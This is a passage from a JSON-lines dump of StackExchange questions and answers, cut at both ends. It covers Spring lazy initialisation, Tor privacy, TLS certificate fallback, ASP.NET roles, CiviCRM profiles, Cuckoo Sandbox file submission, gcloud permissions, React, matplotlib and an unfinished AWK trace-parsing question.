things)?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Spring framework default-lazy-init all beans\n\nQuestion: Is there a spring property to lazy-init all beans that spring framework loads ?\nI know about these properties\n<code> - lazy-init=\"true\"\n - default-lazy-init=\"true\"\n<\/code>\nhowever there are multiple spring config xml files and some are packaged within jar so dont have liberty to change neither <bean> nor <beans> tag.\nAny other way to tackle this via configuration ? or programatically ?\nComment: I really wish I could do this. We are autowiring a lot of beans, so it takes 15-20 seconds to pre-instantiate them all. I would love to change this on my developer machine to improve startup time, but keep it the same on the production server.\nAnswer: Short of extending the Spring bean loader, none that I know of.\nAnswer: You caN also use <code>@Lazy<\/code> annotation, but it is the same as you mentioned above.\nAnswer: According to java doc this should work ( though it looks not nice)\n<code>if (context.getBeanFactory() instanceof DefaultListableBeanFactory)\n {\n ((DefaultListableBeanFactory) context.getBeanFactory()).setAllowEagerClassLoading(false);\n }\n<\/code>\nAnswer: I've implemented this on my company, had to extend some classes of spring tough. It wasn't easy, but we gained about 20s on every tomcat startup. Unfortunately, for privacy clauses, I can't show the code, but take a look at ClassPathBeanDefinitionScanner,DefaultBeanDefinitionDocumentReader,ContextNamespaceHandler and ComponentScanBeanDefinitionParser classes. \nComment: Well, its something very similar to this: http:\/\/batmat.net\/blog\/post\/2008\/01\/13\/How-to-load-a-XML-Spring-context-lazily-by-default, but I did also for annotated beans and beans imported from the first xml\nAnswer: Starting with Spring Boot 2 you can use the spring.main.lazy-initialization property to configure lazy initialization across the whole application.\nSetting the property value to true means that all the beans in the application will use lazy initialization.\nin application.yaml\n<code>spring:\n main:\n lazy-initialization: true\n<\/code>\nor in application.properties\n<code>spring.main.lazy-initialization=true\n<\/code>\n","meta":{"source":"stackoverflow","title":"Spring framework default-lazy-init all beans","dup_signals":{}},"subset":"stackexchange"} +{"text":"Noob to tor\/tails\/darknet...forgot to disable Javascript. What to do now?\n\nQuestion: I am a noob as stated in title. I didn't know how to disable Javascript before visiting some not-so-legit sites. So what can I do? I was using tor, I know this is not enough so I have tails ring a persistent volume on a USB stick as added security. Can I go back, with javascript disabled, and create a new user name and information for those sites and be ok? I just browsed these sites but did create user info. \nSo is browsing sites illegal? The sites were certain markets. Can I somehow erase my history? Literally visited 2 markets (looking no keys were exchanged nor vital information not even a name).\nTo disable JS, I just change the level of security on tor, correct? If no, please if you have time explain or point me to a site that can. \nComment: Staying \"anonymous\" on the internet. There's always something that will give you away. Once you've created a history, assume it's permanent. Your computer isn't the only place history is found.\nComment: define \"be ok\"?\nComment: \"Is browsing sites illegal\" is up to the country you are browsing from. As it is a legal question, we are not qualified to answer it.\nAnswer: Tor should have noscript installed. You simply click on the NoScript extension and click disable javascript on all sites.\nUnfortunately, once you've done something on the internet you can't change it. You can't go back and do it again differently, just like you can't in real life.\nConsider refraining from doing things you might later regret, especially if you don't really understand what you're doing.\nComment: \"Tor Browser\" comes with NoScript, there's a difference.\nAnswer: The sequence to check-up is just exactly the same as if you were browsing from unsafe place, like public open wifi : full system scan, log checking, anti-malware tools risen to the maximum protection level. Tor\/darknet is just a network, no darknet-specific problems there so far : you can leak your data with the same result as in clearnet\/internet.\n","meta":{"source":"security.stackexchange","title":"Noob to tor\/tails\/darknet...forgot to disable Javascript. What to do now?","dup_signals":{}},"subset":"stackexchange"} +{"text":"One domain using certificate of other domain\n\nQuestion: I recently Googled a website e.g A.com and found B.com in search result at the top. In reality A.com should be on top as B.com doesn't have anything in common or related to A.com but Google shows it in search result at top. In fact all meta tags \/ keywords are not there in B.com \nNow the interesting part is, when I visit B.com, browser does show me a warning. I ignore it and visit the website. Interestingly, all the content is from A.com. Even the contact form submitted is received by A.com. When I visit B.com without https original B.com is shown, whereas if I use https:\/\/B.com, then A.com is shown (browser url bar shows B.com with security warning)\n1] Now I wonder why this is happening? \n2] Has B.com installed A.com certificate by mistake? \n3] If so, how can they get private key for that purpose? \n4] Why Google is showing that website in search results?\nComment: We have no way (besides guessing) to know what is the matter as long as you don't tell us the names of the websites. Please [edit] your question to do so.\nAnswer: \n2] Has B.com installed A.com certificate by mistake? 3] \u00b4If so, how can they get private key for that purpose?\n\nProbably A.com and B.com are both hosted at the same server and have the same IP address. It is a common (mis)configuration of the server that if there is no certificate configured for B.com then it will use a certificate of another domain at the same IP address, in this case A.com. In other words: B.com does not explicitly use the certificate for A.com but it just happens to be the implicit fallback certificate on the host which serves both A.com and B.com.\n\n1] Now I wonder why this is happening? ... 4] Why Google is showing that website in search results?\n\nIt looks like Google's web crawler does not really care about the validity of the certificate when crawling a web site and thus <code>https:\/\/B.com<\/code> ends up to be indexed despite this configuration problem with the content of <code>https:\/\/A.com<\/code> and thus also shows up in the search results with this content. And the crawlers of Microsoft Bing and Baidu seem to ignore invalid certificates too since they also show up in the logs of a domain I explicitly serve for such tests with an invalid certificate.\n","meta":{"source":"security.stackexchange","title":"One domain using certificate of other domain","dup_signals":{}},"subset":"stackexchange"} +{"text":"Compiler but not Interpreter\n\nQuestion: Total := 60 + 10; \nLD #60\nADD #10\nST Total \n00101000 00111100\n00111000 00001010\n01100000 00101001\nGoing from the HLL code to the binary uses a translator, a question in A levels is asking what translator has been used. But the answer does not allow interpreter, only compiler is the correct answer, why is it so? There isn't any other information.\nAnswer: Well, you haven't given the full wording of the question so I don't know why you think that, unless it is multiple choice or something.\nBut that data suggests they want 'compiler' as the answer because the first translation is from high level language to some sort of assembly, and then from assembly to binary code.\nSo only translation has been done; the code has not been executed yet, and therefore can't have been interpreted.\nAn interpreter may possibly include such a translation as a first pass (but more usually as one step), and that process may be called compilation. For example, high-level language to byte-code.\n","meta":{"source":"stackoverflow","title":"Compiler but not Interpreter","dup_signals":{}},"subset":"stackexchange"} +{"text":"How can i display the Role name for a user in ASP.NET\n\nQuestion: I have a MasterPage in which I display two things: one is the user name which I display with the following command <code><%: Context.User.Identity.GetUserName() %><\/code> and one is the user role. \nHow can i display it?\nThank you.\nComment: When you log a user in you create its Identity - somehow - when this is done you also need to code in the role. I believe that is an extension method. They are extension methods because reading out of Identity stuff can be a nightmare.\nAnswer: Try it like this if you have access to UserManager:\n<code>UserManager.FindByName(Context.User.Identity.GetUserName()).Roles\n<\/code>\nOr if you have a access to any Identity based user you should be able to get roles also like this:\n<code>AppUser.Roles;\n<\/code>\nOr search any Identity user with specific name and get its roles:\n<code>UserManager.FindByName(\"Name\").Roles;\n<\/code>\nI'm using Identity 2.0\nUPDATE:\nSo if you have access UserManager and RoleManager in master page code, you could write a method, which gets user roles like this:\n<code> public List<string> GetUserRoles(string username)\n {\n List<string> ListOfRoleNames = new List<string>();\n var ListOfRoleIds = UserManager.FindByName(username).Roles.Select(x => x.RoleId).ToList();\n foreach(string id in ListOfRoleIds)\n {\n string rolename = RoleManager.FindById(id).Name;\n ListOfRoleNames.Add(rolename);\n }\n\n return ListOfRoleNames;\n }\n<\/code>\nThen it's up to you how you call this in your view or populate these roles to user while loading page.\nComment: My Identity version is 2.2.1. I have access to UserManager but no method there. There is another way to display the user role in a MasterPage? Maybe in code?\nComment: Why not create a a method?\nAnswer: As you are using the Web Forms view engine, I am assuming you must be using asp.net Membership as that was available for MVC 2.0.\nThere can be multiple roles assigned to a user, the following will loop and print them out:\n<code><% foreach(var role in Roles.GetRolesForUser())\n{ %>\n <%:role%>\n<% } %>\n<\/code>\n","meta":{"source":"stackoverflow","title":"How can i display the Role name for a user in ASP.NET","dup_signals":{}},"subset":"stackexchange"} +{"text":"User Dashboard and Edit Profile for Organization\n\nQuestion: We have set up a User dashboard for individuals, and a profile so individuals can update their address, phone, email, etc. It looks like this:\n\nWe would like to set up something similar for an Organization, so permissioned users can see the organization's membership expiration date, and update the contact info for the organization.\nI understand that the way to do this is to set a permissioned relationship, so the individual can view and edit the Organization. However, if I click the Organization, it doesn't take me to a user dashboard for the Organization, but a contact view as if an administrator were logged in. Membership information is not visible. The edit function is not a profile with limited fields, but all the fields an administrator could edit (see below photos):\n\nAm I missing something? Is there a way to see a user dashboard for an organization, like there is for an individual? Can I limit the organizational fields that can be edited?\nI am using CiviCRM 5.31.0 with WordPress.\nAccess control: Subscriber (the user) can: view my contact, edit my contact, access contact dashboard\nRelationship permission: set to view and update\nEDIT pd added image showing what dmaster shows for comparison\nComment: if A works for B, and A is permissioned to Edit B, and A has access to their own Contact Dashboard, then they should be able to access a profile to edit B. Not sure if that is what you are after but it didn't seem to be covered in your description\nComment: We'd like A to be able to access the user dashboard for B, and a profile to edit B's information. Neither is currently the case; clicking the link for B leads to the second and third photos in my post above. Is there a different way to access a profile to edit B?\nComment: on dmaster, as user\/1 if i go to my dashboard https:\/\/dmaster.demo.civicrm.org\/civicrm\/user?reset=1 i see an Org, and if i click the Edit Contact Info and right click to open in new tab it takes me to eg https:\/\/dmaster.demo.civicrm.org\/civicrm\/contact\/relatedcontact?action=update&reset=1&cid=185&rcid=203\nis that same as with your set up?\nComment: or this in the case of their Employer which I just added. https:\/\/dmaster.demo.civicrm.org\/civicrm\/contact\/relatedcontact?action=update&reset=1&cid=47&rcid=203\nComment: Sorry, I can't access the links you provided and the site won't let me create an account.\nComment: all the demo sites just have login \/ pw as demo | demo\nComment: but they get refreshed every 24 hours so not sure if it will still be there. but easy enough for you to follow what i did and repeat isn't it?\nComment: Got it, thank you! I see what you're talking about. On the demo site, the links I'm seeing by the Org are \"Edit Contact Information\" and \"Dashboard,\" which looks like what we want. But that's not what I'm seeing on my site. The links there are \"View\" and \"Edit.\"\nComment: I added another picture to my original post. The second picture now shows how the Organization shows up in the user dashboard, and the links it gives.\nComment: I added a shot from dmaster for comparison. odd. not sure how you would have config on your system that is changing this. worth disabling extensions just to check there isn't something else affecting this.\nAnswer: We have used contact layout editor extension to show only necessary fields on view contact section. Using contact layout editor you can customize the view contact page. You can include profiles with limited fields and hide or remove the edit option via css or JS.\nOr other option is write extension to redirect Org contact to \/civicrm\/contact\/dashboard?cid=123&reset=1\nAFAIK having Relationship permission: set to view and update will only allow user to updated the related contact details but not Payments or Membership. Try giving 'Access civi membership' permission to user role\nAnswer: If you want a user to only edit specific fields for their organisation you can create a profile and add the organisation fields you want to give them access to. From the CiviCRM profiles page:\n\nCiviCRM Profile(s) allow you to aggregate groups of fields and include\nthem in your site as input forms, contact display pages, and search\nand listings features. They provide a powerful set of tools for you to\ncollect information from constituents and selectively share contact\ninformation.\n\nProfiles can be used to list contacts, create new contacts or edit contacts. For your requirement, the profile would be a standalone form profile for editing. When you create a link to the profile edit form, you'll need to make sure you pass the organisaton contact ID in the URL as one of the parameters. For instance, if your profile form had an ID of 6, and the organisation contact ID was 18 then your URL would be:\n<code>www.mydomain.com\/civicrm\/profile\/edit?gid=6&id=18&reset=1<\/code>\nNote that the query parameter label for the contact ID is <code>id<\/code>, not <code>cid<\/code>. The <code>gid<\/code> query parameter refers to the id of the profile form.\nTo ensure the correct permissions to allow access to the profile, you may need to update the civicrm ACL permissions at <code>\/civicrm\/acl?reset=1<\/code>.\nNote: if you do not pass the organisation ID parameter correctly in the URL then you'll get a warning message saying:\n\nThis profile is configured for contact type 'Organization'. It cannot\nbe used to edit contacts of other types.\nComment: So if I have created this profile for the org record, and I have a related individual record which is permission to view and edit the org, can I send a checksum link to the individual in email that will take them to the pre-filled org profile, and update it without them having to log in?\nComment: Something like www.mydomain.com\/civicrm\/profile\/edit?gid=6&id=18&reset=1&cid=indivcontactid&checksum\nComment: I haven't used a checksum link before so not sure if this will work. You might want to ask a seperate question about this.\n","meta":{"source":"civicrm.stackexchange","title":"User Dashboard and Edit Profile for Organization","dup_signals":{}},"subset":"stackexchange"} +{"text":"Manually ending or canceling touch phase in corona sdk?\n\nQuestion: Is it possible to manually cancel or end the touch phase on an object? I basically want to make it impossible for the user to drag the object unless they take there finger off the screen and start to drag it again. Is this possible?\nComment: you can do it in a simple way by adding flag.\nComment: How would I go about doing that? Sorry, about my questions. I'm quite a noob.\nAnswer: <code>local isDragAllowed = 0 -- create a flag or a variable\n\nlocal bg = display.newRect(0,0,display.contentWidth,display.contentHeight) -- background\n\nlocal myObject = display.newImageRect(\"Icon.png\", 50, 50); -- your object\nmyObject.x = 160\nmyObject.y = 240\n\nlocal function touchHandler(event)\n if(event.phase==\"began\")then\n isDragAllowed = 1\n elseif(event.phase==\"moved\" and isDragAllowed==1)then\n -- object will be moved only if the flag is true or 1\n myObject.x = event.x\n myObject.y = event.y\n else\n isDragAllowed = 0 -- resetting the flag on touch end\n end\n return true;\nend\nmyObject:addEventListener(\"touch\",touchHandler)\n\nlocal function bgTouchHandler(event)\n print(event.phase)\n isDragAllowed = 0 -- resetting the flag if drag\/touch happens on background\n return true;\nend\nbg:addEventListener(\"touch\",bgTouchHandler)\n<\/code>\n","meta":{"source":"stackoverflow","title":"Manually ending or canceling touch phase in corona sdk?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Dynamic page numbering using XSL snippet\n\nQuestion: I have page numbers in sequential order within a RTF document. However my document output has multiple documents in sequential order. My first document is of 4 pages, the second is for 3 pages and 3rd 2 pages. My single document output throws out a RTF document comprising of all three documents. But the page no.s are in increasing order 1,2,3,4 ....\nIdeally I would want my second document to start from page 1 and so is the case with my third document.\nHow do I accomplish this using XSL coding within the footer ?\nThanks.\nComment: An example input XML would be nice\nAnswer: In XSL-FO to restart page numbers in a page sequence use <code>initial-page-number=\"1\"<\/code> on your <code><fo:page-sequence><\/code> element.\nWhether that works for your RTF output or not is up to the vendor of your software. What I've given you is what the specification says to do.\n","meta":{"source":"stackoverflow","title":"Dynamic page numbering using XSL snippet","dup_signals":{}},"subset":"stackexchange"} +{"text":"How can I send a file with DLL to Cuckoo Sandbox?\n\nQuestion: I want to submit an executable for analysis in Cuckoo Sandbox.\nThe file must be in the same folder with a DLL I have. How can I request Cuckoo to test my exe and make it run properly? (i.e exe and dll in the same directory).\nNote - I don't have any problem to put the dll at the guest machine, take a snapshot and then submit the file. I just don't know where to put my dll in the guest machine (Where Cuckoo put the exe on guest?)\nThanks in advance.\nAnswer: Cuckoo creates a folder with a randomly generated name (So it changes every time you run a new analysis) in the root of C:\\ which it uses to store the submitted file, among other things.\nWhat you could probably do is create a zip file containing both your executable and your DLL file, then submit that zip to Cuckoo. When the analysis is run Cuckoo's zip package will unzip the archive containing both files into the same directory, then run the first executable it finds from that zip.\nI think that should do the trick.\n","meta":{"source":"security.stackexchange","title":"How can I send a file with DLL to Cuckoo Sandbox?","dup_signals":{}},"subset":"stackexchange"} +{"text":"running commands from cloud-builders-community\/sonarqube\/\n\nQuestion: <code>gcloud builds submit . --config=cloudbuild.yaml\nCreating temporary tarball archive of 6 file(s) totalling 3.2 KiB before compression.\nUploading tarball of [.] to [gs:\/\/training_cloudbuild\/source\/1670817617.242895-f55df2adc5e04b5ca65f2ed1a6a12fe4.tgz]\nERROR: (gcloud.builds.submit) 403 Could not upload file [\/tmp\/tmprwqmw411\/file.tgz] to [training_cloudbuild\/source\/1670817617.242895-f55df2adc5e04b5ca65f2ed1a6a12fe4.tgz]: Access denied.\n<\/code>\nrunning commands from cloud-builders-community\/sonarqube\/ in the instance and getting this error .Need help how to run sonar scanner in cloud build .Need to use sonarqube while running the code in cloud build.\nAnswer: From Troubleshooting build errors documentation\n\n4xx client errors\nThis group of errors indicates that the build\nrequest is not successful presumably by fault of the user sending the\nrequest. Some examples of 4xx client errors are:\n\n<code>**Error**: 404 : Requested entity was not found\n**Error**: 404 : Trigger not found\n**Error**: 400 : Failed Precondition\n**Error**: 403 : Permission denied\n<\/code>\nError message:\n<code>ERROR: (gcloud.builds.submit) 403 Could not upload file [\/tmp\/tmprwqmw411\/file.tgz] to [training_cloudbuild\/source\/1670817617.242895-f55df2adc5e04b5ca65f2ed1a6a12fe4.tgz]: Access denied.\n<\/code>\nThe error stats, the Service Account does not have access to <code>[gs:\/\/training_cloudbuild\/]<\/code>\nTry adding below permission to build Service Account:\n<code>storage.objects.create\nstorage.objects.get\nstorage.objects.list\n<\/code>\n","meta":{"source":"stackoverflow","title":"running commands from cloud-builders-community\/sonarqube\/","dup_signals":{}},"subset":"stackexchange"} +{"text":"Objects are not valid as a React child (found: object with keys ..)\n\nQuestion: I am trying to build a basic app where I fetch some restaurants from yelp api.\nI get the error below on iOS and I can't seem to fix it. \n\nObjects are not valid as a React child (found: object with keys {id,\n alias, name, image_url, is_closed, url, review_count, categories,\n rating, coordinates, transactions, price, location, phone,\n display_phone, distance}). If you meant to render a collection of\n children, use an array instead.\n\nWhen I remove the part <code>results={filterResultsByPrice('$')}<\/code> from <code><ResultsList><\/code> the app works again.\nWould appreciate a lot if someone could help.\nThis is my main screen:\n<code>import React, {useState} from 'react';\nimport { View, Text, StyleSheet } from 'react-native';\nimport SearchBar from '..\/component\/SearchBar';\nimport useResults from '..\/hooks\/useResults';\nimport ResultsList from '..\/component\/ResultsList';\n\nconst SearchScreen = () => {\n const [term, setTerm] = useState(''); \n const [searchApi, results, errorMessage] = useResults();\n\n const filterResultsByPrice = (price) => {\n return results.filter( result => {\n return result.price === price;\n });\n\n };\n\n return (\n <View>\n <SearchBar \n term={term} \n onTermChange={(newTerm)=> setTerm(newTerm)} \n onTermSubmit={searchApi}\n \/>\n {errorMessage ? <Text>{errorMessage}<\/Text> : null }\n <Text>We have found {results.length} results<\/Text>\n\n <ResultsList results={filterResultsByPrice('$')} title=\"Cost Effective\"\/>\n <ResultsList results={filterResultsByPrice('$$')} title=\"Bit Pricier\"\/>\n <ResultsList results={filterResultsByPrice('$$$')} title=\"Big Spender\"\/>\n\n <\/View>\n\n );\n\n};\n\nconst styles = StyleSheet.create({});\n\nexport default SearchScreen;\n<\/code>\nThis is the component I want to place on the screen:\n<code>import React from 'react';\nimport { View, Text, StyleSheet} from 'react-native';\n\nconst ResultsList = ({ title, results }) => {\nreturn (\n <View>\n <Text style={styles.title}> {title}<\/Text>\n <Text> Results: {results.length} <\/Text>\n <\/View>\n );\n};\n\nconst styles = StyleSheet.create({\n title:\n {\n fontSize: 18,\n fontWeight: 'bold'\n }\n\n});\n\nexport default ResultsList;\n<\/code>\nAnd this is my useResults hook:\n<code>import {useEffect, useState } from 'react';\nimport yelp from '..\/api\/yelp';\n\nexport default () => {\n\n const [results, setResults] = useState([]); \/\/default is empty array\n const [errorMessage, setErrorMessage] = useState('');\n\n const searchApi = async searchTerm=> {\n console.log('Hi there');\n try {\n const response = await yelp.get('\/search', {\n params: {\n limit: 50, \n term: searchTerm, \n location: 'san jose'\n }\n });\n setResults(response.data.businesses);\n } catch (err) {\n setErrorMessage('Something went wrong.');\n }\n };\n\n useEffect(()=> {\n searchApi('pasta');\n\n }, []);\n\n return [searchApi, results, errorMessage];\n\n};\n<\/code>\nComment: I have no clue why, but after I added the console log under `ResultsList`, without changing absolutely nothing else, it is now working as expected... This is strange.\nComment: Can you please `console log` the results array? It seems the filter for '$' is not being filtered-out properly.\nComment: @Jawadulhassan I can see the full list returning from yelp as expected\nComment: It happens to all us, sometimes :) \n\nBut problem is in your mapping of results.length.\nComment: @CigdemSahiner did you find the answer I a too facing this issue.\nAnswer: You need to update your ResultsList component to this one, hopefully it will fix your issue permanently:\n<code>import React from \"react\";\nimport { View, Text, StyleSheet } from \"react-native\";\n\nconst ResultsList = ({ title, results }) => {\n return (\n <View>\n <Text style={styles.title}> {title}<\/Text>\n {results.map(result => (\n <Text>Results: {result.length}<\/Text>\n ))}\n <\/View>\n );\n};\n\nconst styles = StyleSheet.create({\n title: {\n fontSize: 18,\n fontWeight: \"bold\"\n }\n});\n\nexport default ResultsList;\n<\/code>\n","meta":{"source":"stackoverflow","title":"Objects are not valid as a React child (found: object with keys ..)","dup_signals":{}},"subset":"stackexchange"} +{"text":"Create subplots from output (a singular plot) of a function\n\nQuestion: I have a function that returns a singular plot. I would like to repeat this function thrice and have the 3 plots side-by-side in a 1x3 format. How do i go about achieving this? \n<code>def plot_learning_curve(estimator, X, y, ylim=None, cv=None,\n n_jobs=-1, train_sizes=np.linspace(.1, 1.0, 5)):\n \"\"\"Generate a simple plot of the test and training learning curve\"\"\"\n plt.figure()\n plt.title(str(estimator).split('(')[0]+ \" learning curves\")\n if ylim is not None:\n plt.ylim(*ylim)\n plt.xlabel(\"Training examples\")\n plt.ylabel(\"Score\")\n train_sizes, train_scores, test_scores = learning_curve(\n estimator, X, y, cv=cv, n_jobs=n_jobs, train_sizes=train_sizes)\n train_scores_mean = np.mean(train_scores, axis=1)\n train_scores_std = np.std(train_scores, axis=1)\n test_scores_mean = np.mean(test_scores, axis=1)\n test_scores_std = np.std(test_scores, axis=1)\n plt.grid()\n\n plt.fill_between(train_sizes, train_scores_mean - train_scores_std,\n train_scores_mean + train_scores_std, alpha=0.1,\n color=\"r\")\n plt.fill_between(train_sizes, test_scores_mean - test_scores_std,\n test_scores_mean + test_scores_std, alpha=0.1, color=\"g\")\n plt.plot(train_sizes, train_scores_mean, 'o-', color=\"r\",\n label=\"Training score\")\n plt.plot(train_sizes, test_scores_mean, 'o-', color=\"g\",\n label=\"Cross-validation score\")\n\n plt.legend(loc=\"best\")\n return plt\n<\/code>\nI have tried this method, but it just returns an empty 1x3 grid with the plots below this empty grid\n<code>fig, axes = plt.subplots(nrows = 1, ncols = 3, sharex=\"all\", figsize=(15,5), squeeze=False)\n\naxes[0][0] = plot_learning_curve(tuned_clfs_vert_title2[0][0][1],Xs_train1,Y_train1,cv=skfold)\naxes[0][1] = plot_learning_curve(tuned_clfs_vert_title2[0][1][1],Xs_train1,Y_train1,cv=skfold)\naxes[0][2] = plot_learning_curve(tuned_clfs_vert_title2[0][2][1],Xs_train1,Y_train1,cv=skfold)\n<\/code>\nI'm keen to use this learning curve plotting function as a 'module'. I guess the alternative way is to write a loop within this function.\nComment: Have you had a look at the [matplotlib examples for subplots](https:\/\/matplotlib.org\/examples\/pylab_examples\/subplots_demo.html)?\nAnswer: You don't provide the axis to the plotting function. I can't use your code, because it is not a Minimal, Complete, and Verifiable example. But here is one approach that you can adapt to your needs:\n<code>#plot function with defined axis\ndef plot_subplot(ax, xdata, ydata, plotnr):\n ax.plot(xdata, ydata)\n ax.set_title(\"Plot {}\".format(plotnr))\n return\n\n#subplot grid 2 x 3 to illustrate the example for more than one row\/column\nfig, axes = plt.subplots(nrows = 2, ncols = 3, sharex = \"all\", figsize = (15,5), squeeze=False)\n#reproducibility seed\nnp.random.seed(54321)\n#loop over axes, we have to flatten the array \"axes\", if \"fig\" contains more than one row\nfor i, ax in enumerate(axes.flatten()):\n #generate random length for data\n lenx = np.random.randint(5, 30)\n #generate random data, provide information to subplot function\n plot_subplot(ax, np.arange(lenx), np.random.randint(1, 100, lenx), i)\n\nplt.show()\n<\/code>\nOutput:\n","meta":{"source":"stackoverflow","title":"Create subplots from output (a singular plot) of a function","dup_signals":{}},"subset":"stackexchange"} +{"text":"AWK modulo does not work correctly with trace file\n\nQuestion: Using AWK, I am trying to parse a trace file like this: \n<code>s 5.072000000 _59_ AGT --- 9 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [9] 0 0\nr 5.072000000 _59_ RTR --- 9 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [9] 0 0\ns 5.080000000 _59_ AGT --- 10 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [10] 0 0\nr 5.080000000 _59_ RTR --- 10 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [10] 0 0\ns 5.088000000 _59_ AGT --- 11 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [11] 0 0\nr 5.088000000 _59_ RTR --- 11 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [11] 0 0\ns 5.096000000 _59_ AGT --- 12 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [12] 0 0\nr 5.096000000 _59_ RTR --- 12 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [12] 0 0\ns 5.104000000 _59_ AGT --- 13 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [13] 0 0\nr 5.104000000 _59_ RTR --- 13 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [13] 0 0\ns 5.112000000 _59_ AGT --- 14 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [14] 0 0\nr 5.112000000 _59_ RTR --- 14 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [14] 0 0\ns 5.120000000 _59_ AGT --- 15 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [15] 0 0\nr 5.120000000 _59_ RTR --- 15 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [15] 0 0\ns 5.128000000 _59_ AGT --- 16 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [16] 0 0\nr 5.128000000 _59_ RTR --- 16 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [16] 0 0\ns 5.136000000 _59_ AGT --- 17 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [17] 0 0\nr 5.136000000 _59_ RTR --- 17 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [17] 0 0\ns 5.144000000 _59_ AGT --- 18 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [18] 0 0\nr 5.144000000 _59_ RTR --- 18 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [18] 0 0\ns 5.152000000 _59_ AGT --- 19 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [19] 0 0\nr 5.152000000 _59_ RTR --- 19 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [19] 0 0\ns 5.160000000 _59_ AGT --- 20 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [20] 0 0\nr 5.160000000 _59_ RTR --- 20 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [20] 0 0\ns 5.168000000 _59_ AGT --- 21 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [21] 0 0\nr 5.168000000 _59_ RTR --- 21 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [21] 0 0\ns 5.176000000 _59_ AGT --- 22 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [22] 0 0\nr 5.176000000 _59_ RTR --- 22 cbr 1000 [0 0 0 0] [energy 1994.974330 ei 5.011 es 0.000 et 0.001 er 0.014] ------- [59:0 0:0 32 0] [22] 0 0\n<\/code>\n's' and 'r' in column 1 denote 'send' and 'receive' respectively. Column 2 shows time. I want to run the following branch instruction on all lines and thereby calculate the delivery rate which is the percent ratio of <code>nRecvd\/nSent*100<\/code>, but between in 10-second intervals. Next, I want to append time and delivery rate (in pair) for every interval to FILE so I can later use these pairs for plotting. However, the following AWK code does not give me any output. Where am I wrong? \n<code>BEGIN{\n nSent=0;\n nRecvd=0;\n nDropped=0;\n FILE=\"delivery.txt\"\n}\n\n{\nif ($1 == \"s\" && $4 == \"AGT\") nSent++;\nelse if ($1 ==\"r\" && $4 == \"AGT\") nRecvd++;\nelse if ($1 ==\"D\") nDropped++;\nif ($1 == \"r\" && $4 ==\"AGT\" && ($2 % 10) ==0) { \n print $2 \" \" nSent\/nReceived*100 \"\\n\" >>FILE;\n nSent=0;\n nRecvd=0;\n}\n\n}\n\nEND {\n\n}\n<\/code>\nUpdate: \nAnother part of the trace file is as follows: \n<code>r 10.103806919 _0_ AGT --- 120 cbr 1020 [13a 0 21 800] ------- [33:0 0:0 30 0] [7] 1 0\ns 10.104000000 _33_ AGT --- 126 cbr 1000 [0 0 0 0] [energy 1989.895903 ei 9.962 es 0.000 et 0.076 er 0.066] ------- [33:0 0:0 32 0] [13] 0 0\nr 10.104000000 _33_ RTR --- 126 cbr 1000 [0 0 0 0] [energy 1989.895903 ei 9.962 es 0.000 et 0.076 er 0.066] ------- [33:0 0:0 32 0] [13] 0 0\ns 10.104000000 _33_ RTR --- 126 cbr 1020 [0 0 0 0] [energy 1989.895903 ei 9.962 es 